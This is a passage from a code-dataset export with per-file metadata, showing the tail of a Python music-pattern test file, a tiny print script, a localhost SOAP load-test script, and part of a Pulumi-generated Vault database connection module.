out=UUID('A'),
target_node=UUID('B'),
uuid=UUID('D'),
)
NoteEvent(
amplitude=1.0,
delta=0.75,
duration=0.75,
frequency=1002,
out=UUID('A'),
target_node=UUID('B'),
uuid=UUID('E'),
)
NoteEvent(
amplitude=1.0,
delta=0.75,
duration=0.75,
frequency=1003,
out=UUID('A'),
target_node=UUID('B'),
uuid=UUID('F'),
)
CompositeEvent(
events=(
SynthEvent(
is_stop=True,
uuid=UUID('C'),
),
NullEvent(
delta=0.25,
),
GroupEvent(
is_stop=True,
uuid=UUID('B'),
),
BusEvent(
calculation_rate=None,
channel_count=None,
is_stop=True,
uuid=UUID('A'),
),
),
is_stop=True,
)
"""
)
def test___iter___05():
    events = list(pattern_05)
    assert pytest.helpers.get_objects_as_string(
        events, replace_uuids=True
    ) == uqbar.strings.normalize(
"""
CompositeEvent(
events=(
BusEvent(
calculation_rate=CalculationRate.AUDIO,
channel_count=2,
uuid=UUID('A'),
),
GroupEvent(
uuid=UUID('B'),
),
SynthEvent(
add_action=AddAction.ADD_AFTER,
amplitude=1.0,
fade_time=0.25,
in_=UUID('A'),
synthdef=<SynthDef: system_link_audio_2>,
target_node=UUID('B'),
uuid=UUID('C'),
),
),
)
NoteEvent(
amplitude=1.0,
delta=0.0,
duration=1.0,
frequency=1001,
out=UUID('A'),
target_node=UUID('B'),
uuid=UUID('D'),
)
CompositeEvent(
events=(
BusEvent(
calculation_rate=CalculationRate.AUDIO,
channel_count=2,
uuid=UUID('E'),
),
GroupEvent(
uuid=UUID('F'),
),
SynthEvent(
add_action=AddAction.ADD_AFTER,
amplitude=1.0,
fade_time=0.25,
in_=UUID('E'),
synthdef=<SynthDef: system_link_audio_2>,
target_node=UUID('F'),
uuid=UUID('G'),
),
),
)
NoteEvent(
amplitude=1.0,
delta=0.75,
duration=0.75,
frequency=2001,
is_stop=False,
out=UUID('E'),
target_node=UUID('F'),
uuid=UUID('H'),
)
NoteEvent(
amplitude=1.0,
delta=0.25,
duration=0.75,
frequency=2002,
is_stop=False,
out=UUID('E'),
target_node=UUID('F'),
uuid=UUID('H'),
)
NoteEvent(
amplitude=1.0,
delta=0.5,
duration=1.0,
frequency=1002,
out=UUID('A'),
target_node=UUID('B'),
uuid=UUID('I'),
)
NoteEvent(
amplitude=1.0,
delta=0.5,
duration=0.75,
frequency=2003,
out=UUID('E'),
target_node=UUID('F'),
uuid=UUID('H'),
)
CompositeEvent(
delta=0.25,
events=(
SynthEvent(
is_stop=True,
uuid=UUID('C'),
),
NullEvent(
delta=0.25,
),
GroupEvent(
is_stop=True,
uuid=UUID('B'),
),
BusEvent(
calculation_rate=None,
channel_count=None,
is_stop=True,
uuid=UUID('A'),
),
),
is_stop=True,
)
CompositeEvent(
events=(
SynthEvent(
is_stop=True,
uuid=UUID('G'),
),
NullEvent(
delta=0.25,
),
GroupEvent(
is_stop=True,
uuid=UUID('F'),
),
BusEvent(
calculation_rate=None,
channel_count=None,
is_stop=True,
uuid=UUID('E'),
),
),
is_stop=True,
)
"""
)
def test___iter___06():
    events = list(pattern_06)
    assert pytest.helpers.get_objects_as_string(
        events, replace_uuids=True
    ) == uqbar.strings.normalize(
"""
CompositeEvent(
events=(
GroupEvent(
add_action=AddAction.ADD_TO_TAIL,
uuid=UUID('A'),
),
),
)
NoteEvent(
delta=0.0,
duration=10,
frequency=1001,
target_node=UUID('A'),
uuid=UUID('B'),
)
NoteEvent(
delta=0.0,
duration=10,
frequency=2001,
target_node=UUID('A'),
uuid=UUID('C'),
)
CompositeEvent(
events=(
GroupEvent(
add_action=AddAction.ADD_TO_TAIL,
uuid=UUID('D'),
),
),
)
NoteEvent(
delta=0.0,
duration=10,
frequency=3001,
target_node=UUID('D'),
uuid=UUID('E'),
)
NoteEvent(
delta=10.0,
duration=10,
frequency=4001,
target_node=UUID('D'),
uuid=UUID('F'),
)
NoteEvent(
delta=0.0,
duration=10,
frequency=1002,
target_node=UUID('A'),
uuid=UUID('G'),
)
NoteEvent(
delta=2.0,
duration=10,
frequency=3002,
target_node=UUID('D'),
uuid=UUID('H'),
)
NoteEvent(
delta=0.0,
duration=10,
frequency=2002,
target_node=UUID('A'),
uuid=UUID('I'),
)
NoteEvent(
delta=8.0,
duration=10,
frequency=4002,
target_node=UUID('D'),
uuid=UUID('J'),
)
NoteEvent(
delta=4.0,
duration=10,
frequency=1003,
target_node=UUID('A'),
uuid=UUID('K'),
)
NoteEvent(
delta=0.0,
duration=10,
frequency=2003,
target_node=UUID('A'),
uuid=UUID('L'),
)
CompositeEvent(
delta=12.0,
events=(
NullEvent(
delta=0.25,
),
GroupEvent(
is_stop=True,
uuid=UUID('D'),
),
),
is_stop=True,
)
CompositeEvent(
events=(
NullEvent(
delta=0.25,
),
GroupEvent(
is_stop=True,
uuid=UUID('A'),
),
),
is_stop=True,
)
"""
)
```

- `avg_line_length`: 25.184211; `max_line_length`: 80; `alphanum_fraction`: 0.386834
- `qsc_code_*_quality_signal`: num_words=1181, num_chars=14355, mean_word_length=4.573243, frac_words_unique=0.086367, frac_chars_top_2grams=0.075542, frac_chars_top_3grams=0.0611, frac_chars_top_4grams=0.070357, frac_chars_dupe_5grams=0.903536, frac_chars_dupe_6grams=0.891131, frac_chars_dupe_7grams=0.840955, frac_chars_dupe_8grams=0.79763, frac_chars_dupe_9grams=0.77967, frac_chars_dupe_10grams=0.758378, frac_chars_replacement_symbols=0, frac_chars_digital=0.07606, frac_chars_whitespace=0.503588, size_file_byte=14355, num_lines=569, num_chars_line_max=81, num_chars_line_mean=25.228471, frac_chars_alphabet=0.681869, frac_chars_comments=0, cate_xml_start=0, frac_lines_dupe_lines=0.546763, cate_autogen=0, frac_lines_long_string=0, frac_chars_string_length=0, frac_chars_long_word_length=0, frac_lines_string_concat=0, cate_encoded_data=0, frac_chars_hex_words=0, frac_lines_prompt_comments=0, frac_lines_assert=0.043165
- `qsc_codepython_*_quality_signal`: cate_ast=1, frac_lines_func_ratio=0.043165, cate_var_zero=false, frac_lines_pass=0, frac_lines_import=0.021583, frac_lines_simplefunc=0, score_lines_no_logic=0.064748, frac_lines_print=0
- Unsuffixed `qsc_code_*`/`qsc_codepython_*`: num_words=0, num_chars=0, mean_word_length=0, frac_words_unique=null, frac_chars_top_2grams=0, frac_chars_top_3grams=0, frac_chars_top_4grams=0, frac_chars_dupe_5grams=1, frac_chars_dupe_6grams=1, frac_chars_dupe_7grams=1, frac_chars_dupe_8grams=1, frac_chars_dupe_9grams=1, frac_chars_dupe_10grams=1, frac_chars_replacement_symbols=0, frac_chars_digital=0, frac_chars_whitespace=1, size_file_byte=0, num_lines=0, num_chars_line_max=0, num_chars_line_mean=0, frac_chars_alphabet=0, frac_chars_comments=0, cate_xml_start=0, frac_lines_dupe_lines=0, cate_autogen=0, frac_lines_long_string=0, frac_chars_string_length=0, frac_chars_long_word_length=0, frac_lines_string_concat=null, cate_encoded_data=0, frac_chars_hex_words=0, frac_lines_prompt_comments=0, frac_lines_assert=0, cate_ast=0, frac_lines_func_ratio=0, cate_var_zero=0, frac_lines_pass=0, frac_lines_import=0, frac_lines_simplefunc=0, score_lines_no_logic=0, frac_lines_print=0
- `effective`: 0; `hits`: 7
**Row 6**

- `hexsha`: `b0f584336fc64f91a4256b51628697a8e3ffc2f0`; `size`: 121; `ext`: `py`; `lang`: Python
- Repo fields (identical across the three groups): path `Apurv.py`, repo `Thepetapixl/Git-Github-Oct7-2020`, head `94bc1409a28602c45b1b6af3bd5696cf31384461`, licenses `["MIT"]`
- `max_stars_count`: null; `max_issues_count`: null; `max_forks_count`: 21 (events 2020-10-07T11:56:32.000Z to 2020-10-07T12:13:54.000Z)
- `content`:

```python
print("=============================")
print("\n Welcome to Github Basics! \n")
print("=============================")
```

- `avg_line_length`: 20.166667; `max_line_length`: 40; `alphanum_fraction`: 0.31405
- `qsc_code_*_quality_signal`: num_words=9, num_chars=121, mean_word_length=4.222222, frac_words_unique=0.666667, frac_chars_top_2grams=0, frac_chars_top_3grams=0, frac_chars_top_4grams=0, frac_chars_dupe_5grams=0, frac_chars_dupe_6grams=0, frac_chars_dupe_7grams=0, frac_chars_dupe_8grams=0, frac_chars_dupe_9grams=0, frac_chars_dupe_10grams=0, frac_chars_replacement_symbols=0, frac_chars_digital=0, frac_chars_whitespace=0.082645, size_file_byte=121, num_lines=5, num_chars_line_max=41, num_chars_line_mean=24.2, frac_chars_alphabet=0.342342, frac_chars_comments=0, cate_xml_start=0, frac_lines_dupe_lines=0.666667, cate_autogen=0, frac_lines_long_string=0, frac_chars_string_length=0.735537, frac_chars_long_word_length=0.479339, frac_lines_string_concat=0, cate_encoded_data=0, frac_chars_hex_words=0, frac_lines_prompt_comments=0, frac_lines_assert=0
- `qsc_codepython_*_quality_signal`: cate_ast=1, frac_lines_func_ratio=0, cate_var_zero=true, frac_lines_pass=0, frac_lines_import=0, frac_lines_simplefunc=0, score_lines_no_logic=0, frac_lines_print=1
- Unsuffixed `qsc_code_*`/`qsc_codepython_*`: num_words=1, num_chars=0, mean_word_length=0, frac_words_unique=null, frac_chars_top_2grams=0, frac_chars_top_3grams=0, frac_chars_top_4grams=0, frac_chars_dupe_5grams=0, frac_chars_dupe_6grams=0, frac_chars_dupe_7grams=0, frac_chars_dupe_8grams=0, frac_chars_dupe_9grams=0, frac_chars_dupe_10grams=0, frac_chars_replacement_symbols=0, frac_chars_digital=0, frac_chars_whitespace=0, size_file_byte=0, num_lines=1, num_chars_line_max=0, num_chars_line_mean=0, frac_chars_alphabet=1, frac_chars_comments=0, cate_xml_start=0, frac_lines_dupe_lines=0, cate_autogen=0, frac_lines_long_string=0, frac_chars_string_length=1, frac_chars_long_word_length=1, frac_lines_string_concat=null, cate_encoded_data=0, frac_chars_hex_words=0, frac_lines_prompt_comments=0, frac_lines_assert=0, cate_ast=0, frac_lines_func_ratio=0, cate_var_zero=1, frac_lines_pass=0, frac_lines_import=0, frac_lines_simplefunc=0, score_lines_no_logic=0, frac_lines_print=1
- `effective`: 0; `hits`: 7
**Row 7**

- `hexsha`: `b04288a335516738d4670f19a6ab58f74a403ec4`; `size`: 3051; `ext`: `py`; `lang`: Python
- Repo fields (identical across the three groups): path `PythonScripts/HitHard.py`, repo `vanjikumaran/SynapseLoadTest`, head `914368a6b8120b63f8ea1b995458dd355775ff72`, licenses `["Apache-2.0"]`
- `max_stars_count`, `max_issues_count`, `max_forks_count`: all null, with no event datetimes
- `content`:

```python
import hashlib
import os
import sys
import xml.dom.minidom as mini
import http.client
import threading
import datetime
numberOfconcurrency=200
sampleSoapMessage = """<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"><soapenv:Header/><soapenv:Body><tests><test>vfs_{0}</test><test>vfs_{0}</test><test>vfs_{0}</test><test>vfs_{0}</test><test>vfs_{0}</test><test>vfs_{0}</test><test>vfs_{0}</test><test>vfs_{0}</test><test>vfs_{0}</test><test>vfs_{0}</test><test>vfs_{0}</test><test>vfs_{0}</test><test>vfs_{0}</test><test>vfs_{0}</test><test>vfs_{0}</test><test>vfs_{0}</test><test>vfs_{0}</test><test>vfs_{0}</test><test>vfs_{0}</test><test>vfs_{0}</test><test>vfs_{0}</test><test>vfs_{0}</test><test>vfs_{0}</test><test>vfs_{0}</test><test>vfs_{0}</test><test>vfs_{0}</test><test>vfs_{0}</test><test>vfs_{0}</test><test>vfs_{0}</test><test>vfs_{0}</test><test>vfs_{0}</test><test>vfs_{0}</test><test>vfs_{0}</test><test>vfs_{0}</test><test>vfs_{0}</test><test>vfs_{0}</test><test>vfs_{0}</test><test>vfs_{0}</test><test>vfs_{0}</test><test>vfs_{0}</test><test>vfs_{0}</test><test>vfs_{0}</test><test>vfs_{0}</test><test>vfs_{0}</test><test>vfs_{0}</test><test>vfs_{0}</test><test>vfs_{0}</test><test>vfs_{0}</test><test>vfs_{0}</test><test>vfs_{0}</test><test>vfs_{0}</test><test>vfs_{0}</test><test>vfs_{0}</test><test>vfs_{0}</test><test>vfs_{0}</test><test>vfs_{0}</test><test>vfs_{0}</test><test>vfs_{0}</test><test>vfs_{0}</test><test>vfs_{0}</test><test>vfs_{0}</test><test>vfs_{0}</test><test>vfs_{0}</test><test>vfs_{0}</test><test>vfs_{0}</test><test>vfs_{0}</test><test>vfs_{0}</test><test>vfs_{0}</test><test>vfs_{0}</test><test>vfs_{0}</test><test>vfs_{0}</test><test>vfs_{0}</test><test>vfs_{0}</test><test>vfs_{0}</test><test>vfs_{0}</test><test>vfs_{0}</test><test>vfs_{0}</test><test>vfs_{0}</test><test>vfs_{0}</test><test>vfs_{0}</test><test>vfs_{0}</test><test>vfs_{0}</test><test>vfs_{0}</test><test>vfs_{0}</test><test>vfs_{0}</test><test>vfs_{0}</test><test>vfs_{0}</test><test>vfs_{0}</test><test>vfs_{0}</test><test>vfs_{0}</test><test>vfs_{0}</test><test>vfs_{0}</test><test>vfs_{0}</test><test>vfs_{0}</test><test>vfs_{0}</test><test>vfs_{0}</test><test>vfs_{0}</test><test>vfs_{0}</test><test>vfs_{0}</test><test>vfs_{0}</test><test>vfs_{0}</test><test>vfs_{0}</test><test>vfs_{0}</test><test>vfs_{0}</test><test>vfs_{0}</test><test>vfs_{0}</test><test>vfs_{0}</test><test>vfs_{0}</test><test>vfs_{0}</test><test>vfs_{0}</test></tests></soapenv:Body></soapenv:Envelope>"""
class ThreadClass(threading.Thread):
    def run(self):
        for i in range(1001, 1501):
            print(i)
            headers = {"Content-Type": "application/xml","SOAPAction": "urn:getFullQuote"}
            conn = http.client.HTTPConnection("localhost", 8280, timeout=3000)
            conn.request("POST", "/services/vfs_{0}".format(i), sampleSoapMessage.format(i), headers)
            response = conn.getresponse()
            print(response)
            print(" ---- Thread ----- " + self.getName())

for i in range(numberOfconcurrency):
    t = ThreadClass()
    t.start()
```

- `avg_line_length`: 95.34375; `max_line_length`: 2382; `alphanum_fraction`: 0.667322
- `qsc_code_*_quality_signal`: num_words=543, num_chars=3051, mean_word_length=3.54512, frac_words_unique=0.117864, frac_chars_top_2grams=0.230649, frac_chars_top_3grams=0.457143, frac_chars_top_4grams=0.685714, frac_chars_dupe_5grams=0.685714, frac_chars_dupe_6grams=0.685714, frac_chars_dupe_7grams=0.685714, frac_chars_dupe_8grams=0.685714, frac_chars_dupe_9grams=0.685714, frac_chars_dupe_10grams=0.685714, frac_chars_replacement_symbols=0, frac_chars_digital=0.044158, frac_chars_whitespace=0.03507, size_file_byte=3051, num_lines=31, num_chars_line_max=2383, num_chars_line_mean=98.419355, frac_chars_alphabet=0.609715, frac_chars_comments=0, cate_xml_start=0, frac_lines_dupe_lines=0, cate_autogen=0, frac_lines_long_string=0.045455, frac_chars_string_length=0.805902, frac_chars_long_word_length=0, frac_lines_string_concat=0, cate_encoded_data=0, frac_chars_hex_words=0, frac_lines_prompt_comments=0, frac_lines_assert=0
- `qsc_codepython_*_quality_signal`: cate_ast=1, frac_lines_func_ratio=0.045455, cate_var_zero=false, frac_lines_pass=0, frac_lines_import=0.318182, frac_lines_simplefunc=0, score_lines_no_logic=0.409091, frac_lines_print=0.136364
- Unsuffixed `qsc_code_*`/`qsc_codepython_*`: num_words=0, num_chars=0, mean_word_length=0, frac_words_unique=null, frac_chars_top_2grams=1, frac_chars_top_3grams=1, frac_chars_top_4grams=1, frac_chars_dupe_5grams=0, frac_chars_dupe_6grams=0, frac_chars_dupe_7grams=0, frac_chars_dupe_8grams=0, frac_chars_dupe_9grams=0, frac_chars_dupe_10grams=1, frac_chars_replacement_symbols=0, frac_chars_digital=0, frac_chars_whitespace=0, size_file_byte=0, num_lines=0, num_chars_line_max=1, num_chars_line_mean=0, frac_chars_alphabet=0, frac_chars_comments=0, cate_xml_start=0, frac_lines_dupe_lines=0, cate_autogen=0, frac_lines_long_string=0, frac_chars_string_length=1, frac_chars_long_word_length=0, frac_lines_string_concat=null, cate_encoded_data=0, frac_chars_hex_words=0, frac_lines_prompt_comments=0, frac_lines_assert=0, cate_ast=0, frac_lines_func_ratio=0, cate_var_zero=0, frac_lines_pass=0, frac_lines_import=1, frac_lines_simplefunc=0, score_lines_no_logic=0, frac_lines_print=0
- `effective`: 0; `hits`: 7
**Row 8**

- `hexsha`: `b062bcf428aa338ef6f8ce77d681d2b0ade4abc8`; `size`: 52719; `ext`: `py`; `lang`: Python
- Repo fields (identical across the three groups): path `sdk/python/pulumi_vault/database/secret_backend_connection.py`, repo `pulumi/pulumi-vault`, head `1682875f4a5d7d508f36e166529ad2b8aec34090`, licenses `["ECL-2.0", "Apache-2.0"]`
- `max_stars_count`: 10 (events 2019-10-07T17:44:18.000Z to 2022-03-30T20:46:33.000Z); `max_issues_count`: 79 (events 2019-10-11T18:13:07.000Z to 2022-03-31T21:09:41.000Z); `max_forks_count`: 2 (events 2019-10-28T10:08:40.000Z to 2020-03-17T14:20:55.000Z)
- `content`:

```python
# coding=utf-8
# *** WARNING: this file was generated by the Pulumi Terraform Bridge (tfgen) Tool. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union, overload
from .. import _utilities
from . import outputs
from ._inputs import *
__all__ = ['SecretBackendConnectionArgs', 'SecretBackendConnection']
@pulumi.input_type
class SecretBackendConnectionArgs:
def __init__(__self__, *,
backend: pulumi.Input[str],
allowed_roles: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
cassandra: Optional[pulumi.Input['SecretBackendConnectionCassandraArgs']] = None,
data: Optional[pulumi.Input[Mapping[str, Any]]] = None,
elasticsearch: Optional[pulumi.Input['SecretBackendConnectionElasticsearchArgs']] = None,
hana: Optional[pulumi.Input['SecretBackendConnectionHanaArgs']] = None,
mongodb: Optional[pulumi.Input['SecretBackendConnectionMongodbArgs']] = None,
mongodbatlas: Optional[pulumi.Input['SecretBackendConnectionMongodbatlasArgs']] = None,
mssql: Optional[pulumi.Input['SecretBackendConnectionMssqlArgs']] = None,
mysql: Optional[pulumi.Input['SecretBackendConnectionMysqlArgs']] = None,
mysql_aurora: Optional[pulumi.Input['SecretBackendConnectionMysqlAuroraArgs']] = None,
mysql_legacy: Optional[pulumi.Input['SecretBackendConnectionMysqlLegacyArgs']] = None,
mysql_rds: Optional[pulumi.Input['SecretBackendConnectionMysqlRdsArgs']] = None,
name: Optional[pulumi.Input[str]] = None,
oracle: Optional[pulumi.Input['SecretBackendConnectionOracleArgs']] = None,
postgresql: Optional[pulumi.Input['SecretBackendConnectionPostgresqlArgs']] = None,
root_rotation_statements: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
snowflake: Optional[pulumi.Input['SecretBackendConnectionSnowflakeArgs']] = None,
verify_connection: Optional[pulumi.Input[bool]] = None):
"""
The set of arguments for constructing a SecretBackendConnection resource.
:param pulumi.Input[str] backend: The unique name of the Vault mount to configure.
:param pulumi.Input[Sequence[pulumi.Input[str]]] allowed_roles: A list of roles that are allowed to use this
connection.
:param pulumi.Input['SecretBackendConnectionCassandraArgs'] cassandra: A nested block containing configuration options for Cassandra connections.
:param pulumi.Input[Mapping[str, Any]] data: A map of sensitive data to pass to the endpoint. Useful for templated connection strings.
:param pulumi.Input['SecretBackendConnectionElasticsearchArgs'] elasticsearch: A nested block containing configuration options for Elasticsearch connections.
:param pulumi.Input['SecretBackendConnectionHanaArgs'] hana: A nested block containing configuration options for SAP HanaDB connections.
:param pulumi.Input['SecretBackendConnectionMongodbArgs'] mongodb: A nested block containing configuration options for MongoDB connections.
:param pulumi.Input['SecretBackendConnectionMongodbatlasArgs'] mongodbatlas: A nested block containing configuration options for MongoDB Atlas connections.
:param pulumi.Input['SecretBackendConnectionMssqlArgs'] mssql: A nested block containing configuration options for MSSQL connections.
:param pulumi.Input['SecretBackendConnectionMysqlArgs'] mysql: A nested block containing configuration options for MySQL connections.
:param pulumi.Input['SecretBackendConnectionMysqlAuroraArgs'] mysql_aurora: A nested block containing configuration options for Aurora MySQL connections.
:param pulumi.Input['SecretBackendConnectionMysqlLegacyArgs'] mysql_legacy: A nested block containing configuration options for legacy MySQL connections.
:param pulumi.Input['SecretBackendConnectionMysqlRdsArgs'] mysql_rds: A nested block containing configuration options for RDS MySQL connections.
:param pulumi.Input[str] name: A unique name to give the database connection.
:param pulumi.Input['SecretBackendConnectionOracleArgs'] oracle: A nested block containing configuration options for Oracle connections.
:param pulumi.Input['SecretBackendConnectionPostgresqlArgs'] postgresql: A nested block containing configuration options for PostgreSQL connections.
:param pulumi.Input[Sequence[pulumi.Input[str]]] root_rotation_statements: A list of database statements to be executed to rotate the root user's credentials.
:param pulumi.Input['SecretBackendConnectionSnowflakeArgs'] snowflake: A nested block containing configuration options for Snowflake connections.
:param pulumi.Input[bool] verify_connection: Whether the connection should be verified on
initial configuration or not.
"""
pulumi.set(__self__, "backend", backend)
if allowed_roles is not None:
pulumi.set(__self__, "allowed_roles", allowed_roles)
if cassandra is not None:
pulumi.set(__self__, "cassandra", cassandra)
if data is not None:
pulumi.set(__self__, "data", data)
if elasticsearch is not None:
pulumi.set(__self__, "elasticsearch", elasticsearch)
if hana is not None:
pulumi.set(__self__, "hana", hana)
if mongodb is not None:
pulumi.set(__self__, "mongodb", mongodb)
if mongodbatlas is not None:
pulumi.set(__self__, "mongodbatlas", mongodbatlas)
if mssql is not None:
pulumi.set(__self__, "mssql", mssql)
if mysql is not None:
pulumi.set(__self__, "mysql", mysql)
if mysql_aurora is not None:
pulumi.set(__self__, "mysql_aurora", mysql_aurora)
if mysql_legacy is not None:
pulumi.set(__self__, "mysql_legacy", mysql_legacy)
if mysql_rds is not None:
pulumi.set(__self__, "mysql_rds", mysql_rds)
if name is not None:
pulumi.set(__self__, "name", name)
if oracle is not None:
pulumi.set(__self__, "oracle", oracle)
if postgresql is not None:
pulumi.set(__self__, "postgresql", postgresql)
if root_rotation_statements is not None:
pulumi.set(__self__, "root_rotation_statements", root_rotation_statements)
if snowflake is not None:
pulumi.set(__self__, "snowflake", snowflake)
if verify_connection is not None:
pulumi.set(__self__, "verify_connection", verify_connection)
@property
@pulumi.getter
def backend(self) -> pulumi.Input[str]:
"""
The unique name of the Vault mount to configure.
"""
return pulumi.get(self, "backend")
@backend.setter
def backend(self, value: pulumi.Input[str]):
pulumi.set(self, "backend", value)
@property
@pulumi.getter(name="allowedRoles")
def allowed_roles(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:
"""
A list of roles that are allowed to use this
connection.
"""
return pulumi.get(self, "allowed_roles")
@allowed_roles.setter
def allowed_roles(self, value: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]):
pulumi.set(self, "allowed_roles", value)
@property
@pulumi.getter
def cassandra(self) -> Optional[pulumi.Input['SecretBackendConnectionCassandraArgs']]:
"""
A nested block containing configuration options for Cassandra connections.
"""
return pulumi.get(self, "cassandra")
@cassandra.setter
def cassandra(self, value: Optional[pulumi.Input['SecretBackendConnectionCassandraArgs']]):
pulumi.set(self, "cassandra", value)
@property
@pulumi.getter
def data(self) -> Optional[pulumi.Input[Mapping[str, Any]]]:
"""
A map of sensitive data to pass to the endpoint. Useful for templated connection strings.
"""
return pulumi.get(self, "data")
@data.setter
def data(self, value: Optional[pulumi.Input[Mapping[str, Any]]]):
pulumi.set(self, "data", value)
@property
@pulumi.getter
def elasticsearch(self) -> Optional[pulumi.Input['SecretBackendConnectionElasticsearchArgs']]:
"""
A nested block containing configuration options for Elasticsearch connections.
"""
return pulumi.get(self, "elasticsearch")
@elasticsearch.setter
def elasticsearch(self, value: Optional[pulumi.Input['SecretBackendConnectionElasticsearchArgs']]):
pulumi.set(self, "elasticsearch", value)
@property
@pulumi.getter
def hana(self) -> Optional[pulumi.Input['SecretBackendConnectionHanaArgs']]:
"""
A nested block containing configuration options for SAP HanaDB connections.
"""
return pulumi.get(self, "hana")
@hana.setter
def hana(self, value: Optional[pulumi.Input['SecretBackendConnectionHanaArgs']]):
pulumi.set(self, "hana", value)
@property
@pulumi.getter
def mongodb(self) -> Optional[pulumi.Input['SecretBackendConnectionMongodbArgs']]:
"""
A nested block containing configuration options for MongoDB connections.
"""
return pulumi.get(self, "mongodb")
@mongodb.setter
def mongodb(self, value: Optional[pulumi.Input['SecretBackendConnectionMongodbArgs']]):
pulumi.set(self, "mongodb", value)
@property
@pulumi.getter
def mongodbatlas(self) -> Optional[pulumi.Input['SecretBackendConnectionMongodbatlasArgs']]:
"""
A nested block containing configuration options for MongoDB Atlas connections.
"""
return pulumi.get(self, "mongodbatlas")
@mongodbatlas.setter
def mongodbatlas(self, value: Optional[pulumi.Input['SecretBackendConnectionMongodbatlasArgs']]):
pulumi.set(self, "mongodbatlas", value)
@property
@pulumi.getter
def mssql(self) -> Optional[pulumi.Input['SecretBackendConnectionMssqlArgs']]:
"""
A nested block containing configuration options for MSSQL connections.
"""
return pulumi.get(self, "mssql")
@mssql.setter
def mssql(self, value: Optional[pulumi.Input['SecretBackendConnectionMssqlArgs']]):
pulumi.set(self, "mssql", value)
@property
@pulumi.getter
def mysql(self) -> Optional[pulumi.Input['SecretBackendConnectionMysqlArgs']]:
"""
A nested block containing configuration options for MySQL connections.
"""
return pulumi.get(self, "mysql")
@mysql.setter
def mysql(self, value: Optional[pulumi.Input['SecretBackendConnectionMysqlArgs']]):
pulumi.set(self, "mysql", value)
@property
@pulumi.getter(name="mysqlAurora")
def mysql_aurora(self) -> Optional[pulumi.Input['SecretBackendConnectionMysqlAuroraArgs']]:
"""
A nested block containing configuration options for Aurora MySQL connections.
"""
return pulumi.get(self, "mysql_aurora")
@mysql_aurora.setter
def mysql_aurora(self, value: Optional[pulumi.Input['SecretBackendConnectionMysqlAuroraArgs']]):
pulumi.set(self, "mysql_aurora", value)
@property
@pulumi.getter(name="mysqlLegacy")
def mysql_legacy(self) -> Optional[pulumi.Input['SecretBackendConnectionMysqlLegacyArgs']]:
"""
A nested block containing configuration options for legacy MySQL connections.
"""
return pulumi.get(self, "mysql_legacy")
@mysql_legacy.setter
def mysql_legacy(self, value: Optional[pulumi.Input['SecretBackendConnectionMysqlLegacyArgs']]):
pulumi.set(self, "mysql_legacy", value)
@property
@pulumi.getter(name="mysqlRds")
def mysql_rds(self) -> Optional[pulumi.Input['SecretBackendConnectionMysqlRdsArgs']]:
"""
A nested block containing configuration options for RDS MySQL connections.
"""
return pulumi.get(self, "mysql_rds")
@mysql_rds.setter
def mysql_rds(self, value: Optional[pulumi.Input['SecretBackendConnectionMysqlRdsArgs']]):
pulumi.set(self, "mysql_rds", value)
@property
@pulumi.getter
def name(self) -> Optional[pulumi.Input[str]]:
"""
A unique name to give the database connection.
"""
return pulumi.get(self, "name")
@name.setter
def name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "name", value)
@property
@pulumi.getter
def oracle(self) -> Optional[pulumi.Input['SecretBackendConnectionOracleArgs']]:
"""
A nested block containing configuration options for Oracle connections.
"""
return pulumi.get(self, "oracle")
@oracle.setter
def oracle(self, value: Optional[pulumi.Input['SecretBackendConnectionOracleArgs']]):
pulumi.set(self, "oracle", value)
@property
@pulumi.getter
def postgresql(self) -> Optional[pulumi.Input['SecretBackendConnectionPostgresqlArgs']]:
"""
A nested block containing configuration options for PostgreSQL connections.
"""
return pulumi.get(self, "postgresql")
@postgresql.setter
def postgresql(self, value: Optional[pulumi.Input['SecretBackendConnectionPostgresqlArgs']]):
pulumi.set(self, "postgresql", value)
@property
@pulumi.getter(name="rootRotationStatements")
def root_rotation_statements(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:
"""
A list of database statements to be executed to rotate the root user's credentials.
"""
return pulumi.get(self, "root_rotation_statements")
@root_rotation_statements.setter
def root_rotation_statements(self, value: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]):
pulumi.set(self, "root_rotation_statements", value)
@property
@pulumi.getter
def snowflake(self) -> Optional[pulumi.Input['SecretBackendConnectionSnowflakeArgs']]:
"""
A nested block containing configuration options for Snowflake connections.
"""
return pulumi.get(self, "snowflake")
@snowflake.setter
def snowflake(self, value: Optional[pulumi.Input['SecretBackendConnectionSnowflakeArgs']]):
pulumi.set(self, "snowflake", value)
@property
@pulumi.getter(name="verifyConnection")
def verify_connection(self) -> Optional[pulumi.Input[bool]]:
"""
Whether the connection should be verified on
initial configuration or not.
"""
return pulumi.get(self, "verify_connection")
@verify_connection.setter
def verify_connection(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "verify_connection", value)
@pulumi.input_type
class _SecretBackendConnectionState:
def __init__(__self__, *,
allowed_roles: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
backend: Optional[pulumi.Input[str]] = None,
cassandra: Optional[pulumi.Input['SecretBackendConnectionCassandraArgs']] = None,
data: Optional[pulumi.Input[Mapping[str, Any]]] = None,
elasticsearch: Optional[pulumi.Input['SecretBackendConnectionElasticsearchArgs']] = None,
hana: Optional[pulumi.Input['SecretBackendConnectionHanaArgs']] = None,
mongodb: Optional[pulumi.Input['SecretBackendConnectionMongodbArgs']] = None,
mongodbatlas: Optional[pulumi.Input['SecretBackendConnectionMongodbatlasArgs']] = None,
mssql: Optional[pulumi.Input['SecretBackendConnectionMssqlArgs']] = None,
mysql: Optional[pulumi.Input['SecretBackendConnectionMysqlArgs']] = None,
mysql_aurora: Optional[pulumi.Input['SecretBackendConnectionMysqlAuroraArgs']] = None,
mysql_legacy: Optional[pulumi.Input['SecretBackendConnectionMysqlLegacyArgs']] = None,
mysql_rds: Optional[pulumi.Input['SecretBackendConnectionMysqlRdsArgs']] = None,
name: Optional[pulumi.Input[str]] = None,
oracle: Optional[pulumi.Input['SecretBackendConnectionOracleArgs']] = None,
postgresql: Optional[pulumi.Input['SecretBackendConnectionPostgresqlArgs']] = None,
